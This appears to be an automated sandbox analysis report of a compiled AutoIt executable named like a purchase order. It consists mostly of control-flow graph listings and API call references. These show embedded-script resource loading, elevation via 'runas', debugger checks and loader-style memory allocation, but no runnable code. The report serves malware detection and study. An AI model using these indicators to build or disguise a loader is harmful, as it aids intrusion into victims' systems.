104586->104585 104614 c78d91 74 API calls 3 library calls 104587->104614 104590 c78b49 104588->104590 104590->104587 104594 c78b52 104590->104594 104591 c78ba8 104592 c78bcd 104591->104592 104593 c78bac 104591->104593 104615 c789a9 58 API calls __malloc_crt 104592->104615 104595 
c78bb9 104593->104595 104598 c353a6 __fcloseall 83 API calls 104593->104598 104594->104613 104625 c353a6 104594->104625 104602 c353a6 __fcloseall 83 API calls 104595->104602 104595->104613 104598->104595 104599 c78bd5 104600 c78bfb 104599->104600 104601 c78bdb 104599->104601 104616 c78c2b 90 API calls 104600->104616 104603 c78be8 104601->104603 104605 c353a6 __fcloseall 83 API calls 104601->104605 104602->104613 104607 c353a6 __fcloseall 83 API calls 104603->104607 104603->104613 104605->104603 104606 c78c02 104617 c78d0d 104606->104617 104607->104613 104610 c78c16 104612 c353a6 __fcloseall 83 API calls 104610->104612 104610->104613 104611 c353a6 __fcloseall 83 API calls 104611->104610 104612->104613 104613->104245 104614->104591 104615->104599 104616->104606 104618 c78d1a 104617->104618 104621 c78d20 104617->104621 104619 c32d55 _free 58 API calls 104618->104619 104619->104621 104620 c78d31 104623 c78c09 104620->104623 104624 c32d55 _free 58 API calls 104620->104624 104621->104620 104622 c32d55 _free 58 API calls 104621->104622 104622->104620 104623->104610 104623->104611 104624->104623 104626 c353b2 __setmbcp 104625->104626 104627 c353c6 104626->104627 104628 c353de 104626->104628 104654 c38b28 58 API calls __getptd_noexit 104627->104654 104630 c36c11 __lock_file 59 API calls 104628->104630 104635 c353d6 __setmbcp 104628->104635 104632 c353f0 104630->104632 104631 c353cb 104655 c38db6 9 API calls __wopenfile 104631->104655 104638 c3533a 104632->104638 104635->104613 104639 c35349 104638->104639 104640 c3535d 104638->104640 104700 c38b28 58 API calls __getptd_noexit 104639->104700 104647 c35359 104640->104647 104657 c34a3d 104640->104657 104643 c3534e 104701 c38db6 9 API calls __wopenfile 104643->104701 104656 c35415 LeaveCriticalSection LeaveCriticalSection __wfsopen 104647->104656 104650 c35377 104674 c40a02 104650->104674 104652 c3537d 104652->104647 104653 c32d55 _free 58 API calls 104652->104653 104653->104647 104654->104631 104655->104635 104656->104635 
104658 c34a50 104657->104658 104659 c34a74 104657->104659 104658->104659 104660 c346e6 __filbuf 58 API calls 104658->104660 104663 c40b77 104659->104663 104661 c34a6d 104660->104661 104702 c3d886 104661->104702 104664 c35371 104663->104664 104665 c40b84 104663->104665 104667 c346e6 104664->104667 104665->104664 104666 c32d55 _free 58 API calls 104665->104666 104666->104664 104668 c346f0 104667->104668 104669 c34705 104667->104669 104812 c38b28 58 API calls __getptd_noexit 104668->104812 104669->104650 104671 c346f5 104813 c38db6 9 API calls __wopenfile 104671->104813 104673 c34700 104673->104650 104675 c40a0e __setmbcp 104674->104675 104676 c40a32 104675->104676 104677 c40a1b 104675->104677 104679 c40abd 104676->104679 104681 c40a42 104676->104681 104829 c38af4 58 API calls __getptd_noexit 104677->104829 104834 c38af4 58 API calls __getptd_noexit 104679->104834 104680 c40a20 104830 c38b28 58 API calls __getptd_noexit 104680->104830 104684 c40a60 104681->104684 104685 c40a6a 104681->104685 104831 c38af4 58 API calls __getptd_noexit 104684->104831 104687 c3d206 ___lock_fhandle 59 API calls 104685->104687 104686 c40a65 104835 c38b28 58 API calls __getptd_noexit 104686->104835 104689 c40a70 104687->104689 104692 c40a83 104689->104692 104693 c40a8e 104689->104693 104691 c40ac9 104836 c38db6 9 API calls __wopenfile 104691->104836 104814 c40add 104692->104814 104832 c38b28 58 API calls __getptd_noexit 104693->104832 104696 c40a27 __setmbcp 104696->104652 104698 c40a89 104833 c40ab5 LeaveCriticalSection __unlock_fhandle 104698->104833 104700->104643 104701->104647 104703 c3d892 __setmbcp 104702->104703 104704 c3d8b6 104703->104704 104705 c3d89f 104703->104705 104707 c3d955 104704->104707 104709 c3d8ca 104704->104709 104803 c38af4 58 API calls __getptd_noexit 104705->104803 104809 c38af4 58 API calls __getptd_noexit 104707->104809 104708 c3d8a4 104804 c38b28 58 API calls __getptd_noexit 104708->104804 104712 c3d8f2 104709->104712 104713 c3d8e8 104709->104713 104730 c3d206 
104712->104730 104805 c38af4 58 API calls __getptd_noexit 104713->104805 104714 c3d8ed 104810 c38b28 58 API calls __getptd_noexit 104714->104810 104717 c3d8f8 104719 c3d90b 104717->104719 104720 c3d91e 104717->104720 104739 c3d975 104719->104739 104806 c38b28 58 API calls __getptd_noexit 104720->104806 104721 c3d961 104811 c38db6 9 API calls __wopenfile 104721->104811 104724 c3d8ab __setmbcp 104724->104659 104726 c3d917 104808 c3d94d LeaveCriticalSection __unlock_fhandle 104726->104808 104727 c3d923 104807 c38af4 58 API calls __getptd_noexit 104727->104807 104732 c3d212 __setmbcp 104730->104732 104731 c3d261 EnterCriticalSection 104733 c3d287 __setmbcp 104731->104733 104732->104731 104734 c39c0b __lock 58 API calls 104732->104734 104733->104717 104735 c3d237 104734->104735 104736 c3d24f 104735->104736 104738 c39e2b __ioinit InitializeCriticalSectionAndSpinCount 104735->104738 104737 c3d28b ___lock_fhandle LeaveCriticalSection 104736->104737 104737->104731 104738->104736 104740 c3d982 __write_nolock 104739->104740 104741 c3d9c1 104740->104741 104742 c3d9e0 104740->104742 104770 c3d9b6 104740->104770 104743 c38af4 __set_osfhnd 58 API calls 104741->104743 104746 c3da38 104742->104746 104747 c3da1c 104742->104747 104745 c3d9c6 104743->104745 104744 c3c5f6 __call_reportfault 6 API calls 104748 c3e1d6 104744->104748 104749 c38b28 __wopenfile 58 API calls 104745->104749 104750 c3da51 104746->104750 104753 c418c1 __lseeki64_nolock 60 API calls 104746->104753 104751 c38af4 __set_osfhnd 58 API calls 104747->104751 104748->104726 104752 c3d9cd 104749->104752 104754 c45c6b __flswbuf 58 API calls 104750->104754 104755 c3da21 104751->104755 104756 c38db6 __wopenfile 9 API calls 104752->104756 104753->104750 104757 c3da5f 104754->104757 104758 c38b28 __wopenfile 58 API calls 104755->104758 104756->104770 104759 c3ddb8 104757->104759 104764 c399ac _LocaleUpdate::_LocaleUpdate 58 API calls 104757->104764 104760 c3da28 104758->104760 104761 c3ddd6 104759->104761 104762 c3e14b 
WriteFile 104759->104762 104763 c38db6 __wopenfile 9 API calls 104760->104763 104765 c3defa 104761->104765 104774 c3ddec 104761->104774 104766 c3ddab GetLastError 104762->104766 104772 c3dd78 104762->104772 104763->104770 104767 c3da8b GetConsoleMode 104764->104767 104776 c3df05 104765->104776 104780 c3dfef 104765->104780 104766->104772 104767->104759 104769 c3daca 104767->104769 104768 c3e184 104768->104770 104771 c38b28 __wopenfile 58 API calls 104768->104771 104769->104759 104773 c3dada GetConsoleCP 104769->104773 104770->104744 104778 c3e1b2 104771->104778 104772->104768 104772->104770 104779 c3ded8 104772->104779 104773->104768 104801 c3db09 104773->104801 104774->104768 104775 c3de5b WriteFile 104774->104775 104775->104766 104777 c3de98 104775->104777 104776->104768 104781 c3df6a WriteFile 104776->104781 104777->104774 104782 c3debc 104777->104782 104783 c38af4 __set_osfhnd 58 API calls 104778->104783 104784 c3dee3 104779->104784 104785 c3e17b 104779->104785 104780->104768 104786 c3e064 WideCharToMultiByte 104780->104786 104781->104766 104787 c3dfb9 104781->104787 104782->104772 104783->104770 104788 c38b28 __wopenfile 58 API calls 104784->104788 104789 c38b07 __dosmaperr 58 API calls 104785->104789 104786->104766 104795 c3e0ab 104786->104795 104787->104772 104787->104776 104787->104782 104791 c3dee8 104788->104791 104789->104770 104790 c3e0b3 WriteFile 104793 c3e106 GetLastError 104790->104793 104790->104795 104794 c38af4 __set_osfhnd 58 API calls 104791->104794 104792 c335f5 __write_nolock 58 API calls 104792->104801 104793->104795 104794->104770 104795->104772 104795->104780 104795->104782 104795->104790 104796 c462ba 60 API calls __write_nolock 104796->104801 104797 c47a5e WriteConsoleW CreateFileW __putwch_nolock 104800 c3dc5f 104797->104800 104798 c3dbf2 WideCharToMultiByte 104798->104772 104799 c3dc2d WriteFile 104798->104799 104799->104766 104799->104800 104800->104766 104800->104772 104800->104797 104800->104801 104802 c3dc87 WriteFile 104800->104802 
104801->104772 104801->104792 104801->104796 104801->104798 104801->104800 104802->104766 104802->104800 104803->104708 104804->104724 104805->104714 104806->104727 104807->104726 104808->104724 104809->104714 104810->104721 104811->104724 104812->104671 104813->104673 104837 c3d4c3 104814->104837 104816 c40b41 104850 c3d43d 59 API calls 2 library calls 104816->104850 104818 c40aeb 104818->104816 104819 c3d4c3 __lseek_nolock 58 API calls 104818->104819 104828 c40b1f 104818->104828 104823 c40b16 104819->104823 104820 c3d4c3 __lseek_nolock 58 API calls 104824 c40b2b CloseHandle 104820->104824 104821 c40b49 104822 c40b6b 104821->104822 104851 c38b07 58 API calls 3 library calls 104821->104851 104822->104698 104826 c3d4c3 __lseek_nolock 58 API calls 104823->104826 104824->104816 104827 c40b37 GetLastError 104824->104827 104826->104828 104827->104816 104828->104816 104828->104820 104829->104680 104830->104696 104831->104686 104832->104698 104833->104696 104834->104686 104835->104691 104836->104696 104838 c3d4e3 104837->104838 104839 c3d4ce 104837->104839 104842 c38af4 __set_osfhnd 58 API calls 104838->104842 104844 c3d508 104838->104844 104840 c38af4 __set_osfhnd 58 API calls 104839->104840 104841 c3d4d3 104840->104841 104843 c38b28 __wopenfile 58 API calls 104841->104843 104845 c3d512 104842->104845 104846 c3d4db 104843->104846 104844->104818 104847 c38b28 __wopenfile 58 API calls 104845->104847 104846->104818 104848 c3d51a 104847->104848 104849 c38db6 __wopenfile 9 API calls 104848->104849 104849->104846 104850->104821 104851->104822 104914 c41940 104852->104914 104855 c14799 104920 c17d8c 104855->104920 104856 c1477c 104857 c17bcc 59 API calls 104856->104857 104859 c14788 104857->104859 104916 c17726 104859->104916 104862 c30791 104863 c41940 __write_nolock 104862->104863 104864 c3079e GetLongPathNameW 104863->104864 104865 c17bcc 59 API calls 104864->104865 104866 c172bd 104865->104866 104867 c1700b 104866->104867 104868 c17667 59 API calls 104867->104868 104869 
c1701d 104868->104869 104870 c14750 60 API calls 104869->104870 104871 c17028 104870->104871 104872 c17033 104871->104872 104878 c4e885 104871->104878 104873 c13f74 59 API calls 104872->104873 104875 c1703f 104873->104875 104924 c134c2 104875->104924 104877 c4e89f 104878->104877 104930 c17908 61 API calls 104878->104930 104879 c17052 Mailbox 104879->104012 104881 c14ddd 136 API calls 104880->104881 104882 c1688f 104881->104882 104883 c4e031 104882->104883 104884 c14ddd 136 API calls 104882->104884 104885 c7955b 122 API calls 104883->104885 104886 c168a3 104884->104886 104887 c4e046 104885->104887 104886->104883 104888 c168ab 104886->104888 104889 c4e067 104887->104889 104890 c4e04a 104887->104890 104892 c4e052 104888->104892 104893 c168b7 104888->104893 104891 c30db6 Mailbox 59 API calls 104889->104891 104894 c14e4a 84 API calls 104890->104894 104913 c4e0ac Mailbox 104891->104913 105024 c742f8 90 API calls _wprintf 104892->105024 104931 c16a8c 104893->104931 104894->104892 104898 c4e060 104898->104889 104899 c4e260 104900 c32d55 _free 58 API calls 104899->104900 104901 c4e268 104900->104901 104902 c14e4a 84 API calls 104901->104902 104907 c4e271 104902->104907 104906 c32d55 _free 58 API calls 104906->104907 104907->104906 104908 c14e4a 84 API calls 104907->104908 105030 c6f7a1 89 API calls 4 library calls 104907->105030 104908->104907 104910 c17de1 59 API calls 104910->104913 104913->104899 104913->104907 104913->104910 105025 c6f73d 59 API calls 2 library calls 104913->105025 105026 c6f65e 61 API calls 2 library calls 104913->105026 105027 c7737f 59 API calls Mailbox 104913->105027 105028 c1750f 59 API calls 2 library calls 104913->105028 105029 c1735d 59 API calls Mailbox 104913->105029 104915 c1475d GetFullPathNameW 104914->104915 104915->104855 104915->104856 104917 c17734 104916->104917 104918 c17d2c 59 API calls 104917->104918 104919 c14794 104918->104919 104919->104862 104921 c17da6 104920->104921 104922 c17d99 104920->104922 104923 c30db6 Mailbox 59 API 
calls 104921->104923 104922->104859 104923->104922 104925 c134d4 104924->104925 104929 c134f3 _memmove 104924->104929 104927 c30db6 Mailbox 59 API calls 104925->104927 104926 c30db6 Mailbox 59 API calls 104928 c1350a 104926->104928 104927->104929 104928->104879 104929->104926 104930->104878 104932 c16ab5 104931->104932 104933 c4e41e 104931->104933 105036 c157a6 60 API calls Mailbox 104932->105036 105103 c6f7a1 89 API calls 4 library calls 104933->105103 104936 c16ad7 105037 c157f6 67 API calls 104936->105037 104937 c4e431 105104 c6f7a1 89 API calls 4 library calls 104937->105104 104939 c16aec 104939->104937 104940 c16af4 104939->104940 104942 c17667 59 API calls 104940->104942 104944 c16b00 104942->104944 104943 c4e44d 104945 c16b61 104943->104945 105038 c30957 60 API calls __write_nolock 104944->105038 104947 c4e460 104945->104947 104948 c16b6f 104945->104948 104950 c15c6f CloseHandle 104947->104950 104951 c17667 59 API calls 104948->104951 104949 c16b0c 104952 c17667 59 API calls 104949->104952 104953 c4e46c 104950->104953 104954 c16b78 104951->104954 104955 c16b18 104952->104955 104956 c14ddd 136 API calls 104953->104956 104957 c17667 59 API calls 104954->104957 104958 c14750 60 API calls 104955->104958 104959 c4e488 104956->104959 104960 c16b81 104957->104960 104961 c16b26 104958->104961 104963 c4e4b1 104959->104963 104966 c7955b 122 API calls 104959->104966 105041 c1459b 104960->105041 105039 c15850 ReadFile SetFilePointerEx 104961->105039 105105 c6f7a1 89 API calls 4 library calls 104963->105105 104965 c16b52 105040 c15aee SetFilePointerEx SetFilePointerEx 104965->105040 104970 c4e4a4 104966->104970 104967 c16b98 104971 c17b2e 59 API calls 104967->104971 104973 c4e4ac 104970->104973 104974 c4e4cd 104970->104974 104975 c16ba9 SetCurrentDirectoryW 104971->104975 104972 c4e4c8 105001 c16d0c Mailbox 104972->105001 104976 c14e4a 84 API calls 104973->104976 104977 c14e4a 84 API calls 104974->104977 104980 c16bbc Mailbox 104975->104980 104976->104963 104978 c4e4d2 
104977->104978 104979 c30db6 Mailbox 59 API calls 104978->104979 104986 c4e506 104979->104986 104982 c30db6 Mailbox 59 API calls 104980->104982 104984 c16bcf 104982->104984 104983 c13bbb 104983->103871 104983->103880 104985 c1522e 59 API calls 104984->104985 105013 c16bda Mailbox __wsetenvp 104985->105013 105106 c1750f 59 API calls 2 library calls 104986->105106 104988 c16ce7 105099 c15c6f 104988->105099 104991 c4e740 105112 c772df 59 API calls Mailbox 104991->105112 104992 c16cf3 SetCurrentDirectoryW 104992->105001 104995 c4e762 105113 c8fbce 59 API calls 2 library calls 104995->105113 104998 c4e76f 104999 c32d55 _free 58 API calls 104998->104999 104999->105001 105000 c4e7d9 105116 c6f7a1 89 API calls 4 library calls 105000->105116 105031 c157d4 105001->105031 105004 c4e7f2 105004->104988 105007 c4e7d1 105115 c6f5f7 59 API calls 4 library calls 105007->105115 105010 c17de1 59 API calls 105010->105013 105013->104988 105013->105000 105013->105007 105013->105010 105092 c1586d 67 API calls _wcscpy 105013->105092 105093 c16f5d GetStringTypeW 105013->105093 105094 c16ecc 60 API calls __wcsnicmp 105013->105094 105095 c16faa GetStringTypeW __wsetenvp 105013->105095 105096 c3363d GetStringTypeW _iswctype 105013->105096 105097 c168dc 165 API calls 3 library calls 105013->105097 105098 c17213 59 API calls Mailbox 105013->105098 105014 c17de1 59 API calls 105021 c4e54f Mailbox 105014->105021 105018 c4e792 105114 c6f7a1 89 API calls 4 library calls 105018->105114 105020 c4e7ab 105022 c32d55 _free 58 API calls 105020->105022 105021->104991 105021->105014 105021->105018 105107 c6f73d 59 API calls 2 library calls 105021->105107 105108 c6f65e 61 API calls 2 library calls 105021->105108 105109 c7737f 59 API calls Mailbox 105021->105109 105110 c1750f 59 API calls 2 library calls 105021->105110 105111 c17213 59 API calls Mailbox 105021->105111 105023 c4e7be 105022->105023 105023->105001 105024->104898 105025->104913 105026->104913 105027->104913 105028->104913 105029->104913 
[Rendered control-flow graph condensed: the graph text carried only node IDs, addresses and edge pairs. The API calls it named are kept here, grouped by code region.]
• 0x00C1xxxx-0x00C8xxxx (inside the image loaded at 0x00C10000, AutoIt runtime code): CloseHandle, CharUpperBuffW, CharLowerBuffW, GetFileAttributesW, FindFirstFileW, FindClose, GetSystemTimeAsFileTime, GetStdHandle, OleInitialize, CreateThread, RegisterWindowMessageW, GetVersionExW, GetCurrentProcess, IsWow64Process, GetSystemInfo, GetNativeSystemInfo, LoadLibraryA, GetProcAddress, FreeLibrary, TerminateProcess, VirtualProtect, RegOpenKeyExW, RegQueryValueExW, RegCloseKey, GetFullPathNameW; CRT helpers _memmove, _wcscmp, _wcscat, _wcscpy, _strcat, _wcsstr, __wsplitpath_helper, __itow, __i64tow, __cinit, __wsetenvp, __malloc_crt, _free, __write_nolock.
• 0x017Dxxxx-0x017Exxxx (outside the image mapping): GetPEB, CreateFileW, VirtualAlloc, ReadFile, VirtualAlloc, VirtualFree, CloseHandle, Sleep. In the graph the PEB is read first (node labelled GetPEB), then a file is opened with CreateFileW and read with ReadFile into VirtualAlloc'd memory, which is later released with VirtualFree; a second entry reads the PEB and then calls Sleep.

Control-flow Graph

APIs
• GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00C13B68
• IsDebuggerPresent.KERNEL32 ref: 00C13B7A
• GetFullPathNameW.KERNEL32(00007FFF,?,?,00CD52F8,00CD52E0,?,?), ref: 00C13BEB
  • Part of subcall function 00C17BCC: _memmove.LIBCMT ref: 00C17C06
  • Part of subcall function 00C2092D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00C13C14,00CD52F8,?,?,?), ref: 00C2096E
• SetCurrentDirectoryW.KERNEL32(?), ref: 00C13C6F
• MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,00CC7770,00000010), ref: 00C4D281
• SetCurrentDirectoryW.KERNEL32(?,00CD52F8,?,?,?), ref: 00C4D2B9
• GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00CC4260,00CD52F8,?,?,?), ref: 00C4D33F
• ShellExecuteW.SHELL32(00000000,?,?), ref: 00C4D346
  • Part of subcall function 00C13A46: GetSysColorBrush.USER32(0000000F), ref: 00C13A50
  • Part of subcall function 00C13A46: LoadCursorW.USER32(00000000,00007F00), ref: 00C13A5F
  • Part of subcall function 00C13A46: LoadIconW.USER32(00000063), ref: 00C13A76
  • Part of subcall function 00C13A46: LoadIconW.USER32(000000A4), ref: 00C13A88
  • Part of subcall function 00C13A46: LoadIconW.USER32(000000A2), ref: 00C13A9A
  • Part of subcall function 00C13A46: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00C13AC0
  • Part of subcall function 00C13A46: RegisterClassExW.USER32(?), ref: 00C13B16
  • Part of subcall function 00C139D5: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00C13A03
  • Part of subcall function 00C139D5: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00C13A24
  • Part of subcall function 00C139D5: ShowWindow.USER32(00000000,?,?), ref: 00C13A38
  • Part of subcall function 00C139D5: ShowWindow.USER32(00000000,?,?), ref: 00C13A41
  • Part of subcall function 00C1434A: _memset.LIBCMT ref: 00C14370
  • Part of subcall function 00C1434A: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00C14415
Strings
• runas, xrefs: 00C4D33A
• This is a third-party compiled AutoIt script., xrefs: 00C4D279
Memory Dump Source
• Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
• Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
Similarity
• API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
• String ID: This is a third-party compiled AutoIt script.$runas
• API String ID: 529118366-3287110873
• Opcode ID: 70a133d286b338bf7d5f46d7a3b41b98d663499dc1603292ab0b86fafb230f49
• Instruction ID: 50bb9733143720ef05e386466da9bbd2bed0ed78afbf5453832dfac18a333dff
• Opcode Fuzzy Hash: 70a133d286b338bf7d5f46d7a3b41b98d663499dc1603292ab0b86fafb230f49
• Instruction Fuzzy Hash: D8510A70E08148EECF11EBB5DC15FED7B74AF46714F00426BF462A22A1DA708686FB61

                                                                    Control-flow Graph
                                                                    (rendered graph not recoverable from the extract; entry block c149a0, basic blocks in the ranges c149a0-c14b35 and c4d767-c4d894; API calls GetVersionExW, GetCurrentProcess, IsWow64Process, GetNativeSystemInfo, FreeLibrary, GetSystemInfo; internal calls to c17667, c17bcc, c17d2c, c17726, c14b37)
                                                                    APIs
                                                                    • GetVersionExW.KERNEL32(?), ref: 00C149CD
                                                                      • Part of subcall function 00C17BCC: _memmove.LIBCMT ref: 00C17C06
                                                                    • GetCurrentProcess.KERNEL32(?,00C9FAEC,00000000,00000000,?), ref: 00C14A9A
                                                                    • IsWow64Process.KERNEL32(00000000), ref: 00C14AA1
                                                                    • GetNativeSystemInfo.KERNELBASE(00000000), ref: 00C14AE7
                                                                    • FreeLibrary.KERNEL32(00000000), ref: 00C14AF2
                                                                    • GetSystemInfo.KERNEL32(00000000), ref: 00C14B23
                                                                    • GetSystemInfo.KERNEL32(00000000), ref: 00C14B2F
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                                                                    • String ID:
                                                                    • API String ID: 1986165174-0
                                                                    • Opcode ID: 771eff3e61fb6547d34b0e23a978fdbe9f3201f5e7fe819061aebeb0399ec6bc
                                                                    • Instruction ID: f93c5dd7b6ead0d7e38c7a6945980b5e1cac89386120c3858514e801e4952193
                                                                    • Opcode Fuzzy Hash: 771eff3e61fb6547d34b0e23a978fdbe9f3201f5e7fe819061aebeb0399ec6bc
                                                                    • Instruction Fuzzy Hash: 8C91C53198D7C0DEC735DB6894506EAFFF5BF2A300B4449AED0D793A41D220E688E769

                                                                    Control-flow Graph
                                                                    (rendered graph not recoverable from the extract; entry block c14e89, basic blocks in the ranges c14e89-c14ec6 and c4d933-c4d98b; API calls CreateStreamOnHGlobal, FindResourceExW, LoadResource, SizeofResource, LockResource)
                                                                    APIs
                                                                    • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,00C14D8E,?,?,00000000,00000000), ref: 00C14E99
                                                                    • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00C14D8E,?,?,00000000,00000000), ref: 00C14EB0
                                                                    • LoadResource.KERNEL32(?,00000000,?,?,00C14D8E,?,?,00000000,00000000,?,?,?,?,?,?,00C14E2F), ref: 00C4D937
                                                                    • SizeofResource.KERNEL32(?,00000000,?,?,00C14D8E,?,?,00000000,00000000,?,?,?,?,?,?,00C14E2F), ref: 00C4D94C
                                                                    • LockResource.KERNEL32(00C14D8E,?,?,00C14D8E,?,?,00000000,00000000,?,?,?,?,?,?,00C14E2F,00000000), ref: 00C4D95F
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                    • String ID: SCRIPT
                                                                    • API String ID: 3051347437-3967369404
                                                                    • Opcode ID: e3532827732289bcff4fa2e693fa4ac1b7dadee96052de310ebdb50416e13ff7
                                                                    • Instruction ID: ec3ca390986dce1c7bfcf37dd801091686abca3f49e0e0749dcaddf68dcdf264
                                                                    • Opcode Fuzzy Hash: e3532827732289bcff4fa2e693fa4ac1b7dadee96052de310ebdb50416e13ff7
                                                                    • Instruction Fuzzy Hash: CC115EB5240700BFD7258B65EC48F6BBBBAFFC6B11F20426DF416C6250DBA1E8419660
                                                                    APIs
                                                                    • GetFileAttributesW.KERNELBASE(?,00C4E398), ref: 00C7446A
                                                                    • FindFirstFileW.KERNELBASE(?,?), ref: 00C7447B
                                                                    • FindClose.KERNEL32(00000000), ref: 00C7448B
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: FileFind$AttributesCloseFirst
                                                                    • String ID:
                                                                    • API String ID: 48322524-0
                                                                    • Opcode ID: 420bab4d1e85da9d9d50ae8ffb64f813b75c7327bdd41793024726552eabcdfb
                                                                    • Instruction ID: 1e19c7620982435d0a540c239cb81483652b38c292e5d6180820064c861f636c
                                                                    • Opcode Fuzzy Hash: 420bab4d1e85da9d9d50ae8ffb64f813b75c7327bdd41793024726552eabcdfb
                                                                    • Instruction Fuzzy Hash: C4E02033410900A742146B38EC0D7ED7B5C9F05335F24471BF939C10E0E7745D00A5D5
                                                                    APIs
                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00C20A5B
                                                                    • timeGetTime.WINMM ref: 00C20D16
                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00C20E53
                                                                    • Sleep.KERNEL32(0000000A), ref: 00C20E61
                                                                    • LockWindowUpdate.USER32(00000000,?,?), ref: 00C20EFA
                                                                    • DestroyWindow.USER32 ref: 00C20F06
                                                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00C20F20
                                                                    • Sleep.KERNEL32(0000000A,?,?), ref: 00C54E83
                                                                    • TranslateMessage.USER32(?), ref: 00C55C60
                                                                    • DispatchMessageW.USER32(?), ref: 00C55C6E
                                                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00C55C82
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: Message$PeekSleepWindow$DestroyDispatchLockTimeTranslateUpdatetime
                                                                    • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                                                                    • API String ID: 4212290369-3242690629
                                                                    • Opcode ID: 867e3f28fa81b41f2a0ad816f9780ff496208faf683db1454ba239119f8d5d76
                                                                    • Instruction ID: 68a49700e93ba54ff1a38b543ebc825cd27b599fb6df6ac406a14070ac35169b
                                                                    • Opcode Fuzzy Hash: 867e3f28fa81b41f2a0ad816f9780ff496208faf683db1454ba239119f8d5d76
